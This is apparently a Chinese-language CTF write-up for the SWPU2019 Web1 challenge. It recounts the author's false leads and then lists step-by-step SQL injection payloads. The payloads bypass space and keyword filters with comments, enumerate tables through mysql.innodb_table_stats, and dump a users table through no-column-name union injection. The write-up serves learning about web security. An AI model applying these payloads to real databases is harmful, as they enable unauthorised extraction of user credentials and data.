[SWPU2019]Web1（无列名注入）

Posted 2021-09-14 paidx0

每天一题，记录学习

题目有几个地方把我坑惨了，哈哈哈

首先试了一下注册一个admin账号，然后就发现admin已经被注册

然后就开始试了一堆admin的密码进行爆破，人傻了，考点压根就不在这。

直接注册一个号进去看看

发布广告的位置又让我想起了 XSS，然后就又上当了

其实这是一道SQL注入的题目，太坑了吧

通过简单的测试，过滤了空格，or，and，--+，#等等
因为这里过滤了 or，所以information_schema库自然是也用不成了，所以就用到了无列名的注入方式

具体用法可以看看我的另一篇文章

无列名注入

因为 or 不能用，自然 order by 也没得用了
先试一下字段数，好家伙，22列

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

爆库名

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

爆表名

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

猜测users的列数

-1'/**/union/**/select/**/1,(select/**/1,2/**/union/**/select*from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

-1'/**/union/**/select/**/1,(select/**/1,2,3/**/union/**/select*from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

users的列数为3列，然后再用无列名注入把内容报出来

-1'/**/union/**/select/**/1,(select/**/group_concat(a,b,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'